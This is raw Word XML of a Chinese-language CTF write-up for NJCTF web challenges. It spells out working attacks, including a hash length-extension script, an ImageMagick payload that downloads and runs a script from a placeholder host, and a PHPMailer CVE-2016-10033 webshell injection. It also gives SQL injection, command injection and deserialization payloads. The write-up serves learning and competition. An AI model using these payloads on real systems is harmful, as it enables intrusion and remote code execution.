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92" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WEB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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="ArialRegular"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="ArialRegular"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>此题提供了注册功能，需要获取管理员权限。注册一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="ArialRegular" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>类似</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="ArialRegular"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>admin%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="ArialRegular"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="ArialRegular"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的长用户名，插入数据库后被截断，导致判断username == admin成立，登录即可。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B</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>logical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 w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>这个题有点复杂。访问.Sign.php.swp可以得到计算签名部分的源码。签名部分的计算逻辑比较简单，就是post过去的key和value按照key排序然后拼接在一起，然后再跟一串未知的字符串拼接后计算md5值得到sign值。如果我们要改变post过去的部分值，则需要算出与之匹配的sign签名，这就需要用到hash扩展攻击的方法，具体原理不说了，百度即可。顺便说一句，在point换money那不能动手脚，因为要求必须是1:1的比例且不能为负数也不能超出上限，不过在取消交换那缺不用要求必须是1:1的比例了，利用这一点我们就可以刷钱了。贴上利用脚本：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&lt;?php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$d = 'commentid375money1points1usernameadmin123'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$a = 'id375money1points1000usernameadmin123'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$command0 = "hashpump -s 519864a712a00120f68347defecc4cf4 -d $d -a $a -k "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for($keylen=0;$keylen&lt;=32;$keylen++)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{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$command = $command0.$keylen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exec($command,$str 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$hash = $str[0]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$str = $str[1]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//echo $str."\n"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$str = substr($str,strlen($d)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$pos = strpos($str,substr($a,0,5)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$str = substr($str,0,$pos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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>$str = str_replace("\\x","%",$str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$options_post_data = "comment=id375money1points1usernameadmin123$str&amp;id=375&amp;money=1&amp;points=1000&amp;username=admin123&amp;sign=$hash"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//echo $options_post_data."\n"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//exit(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if(test_oracle($options_post_data))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{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echo "Length=$keylen\n"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die(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}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else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{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echo "Length not $keylen\n"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}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}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function test_oracle($post)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{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// 创建一个新cURL资源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 xml:space="preserve">$curl_handle = curl_init(); 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// 设置URL和相应的选项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$options = array(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CURLOPT_RETURNTRANSFER =&gt; true, //是否接受返回数据，设为flase只返回请求结果成功或失败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CURLOPT_URL =&gt; 'http://218.2.197.235:23739/refund.php',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CURLOPT_HEADER =&gt; false, //执行后返回的数据是否包含返回包的HTTP头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CURLOPT_NOBODY =&gt; false, //与上条类似，是否显示body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CURLOPT_POSTFIELDS =&gt; $post, //请求中需要POST的数据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 xml:space="preserve">CURLOPT_POST =&gt; true, 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CURLOPT_TIMEOUT =&gt; 15, //单位为 秒，curl是同步执行的，这一选项设定了curl的执行时限，即等待服务器返回的时间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CURLOPT_COOKIE =&gt; "PHPSESSID=jq690mh16a2q40kt4jp6a3cqi1"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//CURLOPT_USERAGENT =&gt; '', //设置user-agent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//设置curl的选项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curl_setopt_array($curl_handle, $options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//执行配置完成的curl资源并获取返回值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$curl_result = curl_exec($curl_handle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//获取链接相关信息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$http_code = curl_getinfo($curl_handle,CURLINFO_HTTP_CODE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// 关闭cURL资源，并且释放系统资源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curl_close($curl_handle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//var_dump($curl_result)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echo $curl_result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if(preg_match("/bad/i",$curl_result))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{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return false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}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else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{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</w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>return true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ab/>
        <w:t>}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}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 xml:space="preserve"> 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 xml:space="preserve"> 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?&gt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 w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>得到超过1000块钱后就可以购买服务了，买完发现是个图片格式转换的服务。联系之前爆出的</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>imagemagick</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>漏洞，post内容如下的jpg文件成功getshell：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push graphic-context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viewbox 0 0 640 480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fill 'url(https://example.com/image.jpg"|wget http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x.x.x.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/t.py -O /tmp/x.py &amp;&amp; python /tmp/x.py </w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x.x.x.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2333")'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pop graphic-context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:pStyle w:val="HTML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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正当以为进了服务器就能得到flag的时候，缺发现自己还是太年轻。整个服务器和数据库逛了个遍也没发现flag，无奈之下只能探测下内网。探测过程中发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>172.17.0.19</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个台服务器的80端口是个邮件发送的网页。猜测是用的phpmailer且存在cve-2016-10033getshell漏洞，于是发件人填写</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>attacker\" -oQ/tmp/ -X/var/www/html/uploads/hehe2.php  some"@email.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，内容写上一句话，果然成功getshell。读取flag文件得到flag：</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rStyle w:val="error"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>NJCTF{y0U_r_A_G00oD_PeNt35T3r!}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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Be admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>存在源码index.php.bak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>看代码逻辑，需要进入function show_homepage()函数并且满足if ($_SESSION["isadmin"])条</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>件才能获取flag，</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>需要两个条件:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>isset</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>($_SESSION['id'])即登录时满足if ($row &amp;&amp; login($encrypted_pass, $password))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, base64_decode($_COOKIE["token"] == 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>前者我通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>POST username = admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>password=0 就过了，后来发现好象正确解法因该是</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过sql注入union一个非法的encrypted_pass，解密之后返回false，使false == 0成立，可能数据库里的密文本来就解不开吧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后者在得到session后，可以进入test_identity中解密cookie的逻辑，这个cookie是在登录成功时get_identity()函数生成的，解密失败会返回die("ERROR!");，满足padding oracle的攻击条件，参考：http://www.freebuf.com/articles/web/15504.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解出原始cookie的明文后，即可通过控制iv,即cookie的前16位来构造任意明文，使cookie等于admin即可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G</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uess</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0DCE" w:rsidRPr="00112F5A" w:rsidRDefault="009E0DCE" w:rsidP="009E0DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>首先是一个文件包含，简单的php://filter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获取到upload.php的源码后审计发现上传后的文件的文件名有部分是随机数组成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上传一个zip压缩包(修改后缀为jpg),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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2383405"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20" name="图片 20" descr="D:\Desktop\wp\NJCTFWP\web-wp\image\gu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wp\NJCTFWP\web-wp\image\guess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然后爆破随机数种子即可，SESSION和PHPSESSIONID都可以在HTTP包中获得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```Php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&lt;?php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//744ccd78fffb0c492567eddc42568870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lastRenderedPageBreak/>
        <w:t>for($i=0; $i&lt;999999999; $i++){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$seed = $i;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mt_srand($seed);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$ss = mt_rand();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$hash = md5('0hh3o180gr0eoqscmguamuooo5' . $ss);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$hash2 = '744ccd78fffb0c492567eddc42568870';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if($hash === $hash2){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    echo $i;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}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if($i % 10000000 == 0){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    echo 'run...'.$i."\n";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}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}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```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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4683125" cy="4269740"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="22" name="图片 22" descr="D:\Desktop\wp\NJCTFWP\web-wp\image\gu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wp\NJCTFWP\web-wp\image\gus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拿到种子后计算出文件名的前缀，之后phar包含getshell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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2077090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="21" name="图片 21" descr="D:\Desktop\wp\NJCTFWP\web-wp\image\gu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wp\NJCTFWP\web-wp\image\gus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W</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>allet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112F5A" w:rsidRPr="00112F5A" w:rsidRDefault="00112F5A" w:rsidP="00112F5A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www.zip文件中包含源码，下载后需要解密，找个破解php</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>jiami的网站解密后看源码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112F5A" w:rsidRPr="00112F5A" w:rsidRDefault="00112F5A" w:rsidP="00112F5A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>需要满足判断：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112F5A" w:rsidRPr="00112F5A" w:rsidRDefault="00112F5A" w:rsidP="00112F5A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>sha1((string) $hsh) == md5((string) $auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112F5A" w:rsidRPr="00112F5A" w:rsidRDefault="00112F5A" w:rsidP="00112F5A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>找两个0e+数字形式的hash即可，然后是sql注入，表名直接猜flag，列名用别名绕过，payload如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112F5A" w:rsidRPr="00112F5A" w:rsidRDefault="00112F5A" w:rsidP="00112F5A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>query=321321321321 union select a from (select 1 as a,2 as b from flag where 1=2 union select * from flag)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G</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>et</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0DCE" w:rsidRPr="00112F5A" w:rsidRDefault="009E0DCE" w:rsidP="009E0DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>很容易发现是命令执行漏洞，执行的原命令为 </w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>`cat $useinput`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`cat 1.jpg &amp; ls /`</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>即可看到flag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然后执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>`&amp; cat /9iZM2qTEmq67SOdJp%!oJm2%M4!nhS_thi5_flag`</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>读出来即可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Flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>`NJCTF{Simp13_Pyth0n_C0de_Inj3cti0n_a77ack}`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Text wall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访问.index.php.swo可以得到部分源码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>&lt;?php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>$lists = [];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>Class filelist{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 xml:space="preserve">    public function __toString()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 xml:space="preserve">    {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 xml:space="preserve">        return highlight_file('hiehiehie.txt', true).highlight_file($this-&gt;source, true);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 xml:space="preserve">    }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lastRenderedPageBreak/>
        <w:t>}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>........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="002946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kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?&gt;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一看就知道是个php反序列化的套路。随意post一个数据，例如hiehiehie，然后看到返回包里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setcookie：24c5889e00902d6bcc65073f0e91ea30bbe203c2a%3A1%3A%7Bi%3A0%3Bs%3A9%3A%22hiehiehie%22%3B%7D，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urldecode得到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24c5889e00902d6bcc65073f0e91ea30bbe203c2a:1:{i:0;s:9:"hiehiehie";}。这串字符串后面一截a:1:{i:0;s:9:"hiehiehie";}就是序列化后的内容，而前面40位长度的字符串很容易就能想到是sha1值，经验证果然是后面内容的sha1摘要。于是我们可以实例化filelist这个类来读取文件内容，例如a:2:{i:0;s:1:"a";i:1;O:8:"filelist":1:{s:6:"source";s:9:"index.php";}}，记得前面加上sha1值然后放在cookie的list值中。找到flag所在文件名，同理构造a:2:{i:0;s:1:"a";i:1;O:8:"filelist":1:{s:6:"source";s:40:"../PnK76P1IDfY5KrwsJrh1pL3c6XJ3fj7E_fl4g";}}得到flag：NJCTF{PHP_un5erialization_a77ack_i5_very_Interes71ng}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Blog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题目上直接给了源码，下下来审计下，发现是ruby的，虽然不懂ruby，但是并不影响观看这个网站的逻辑。在app/controllers/users_controller.rb中的第65行代码如下：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/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>params.require(:user).permit(:name, :email, :password, :password_confirmation, :admin)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:pStyle w:val="HTML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这里是注册的代码，可以看到有个admin选项，但是在account-setting页面的表单中并没有这个变量。用burp抓包然后修改post的数据，加上user%5Badmin%5D=1，就能得到管理员权限，然后在user那查看源码可以得到flag：</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>NJCTF{G8msIzOC!*XzpYnOdgTx7jbniiwaUeCo}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Chall 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>这是个nodejs的网站，去github上尝试搜索bibibibi得到源码：</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00112F5A">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>https://github.com/0lddriver/app</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
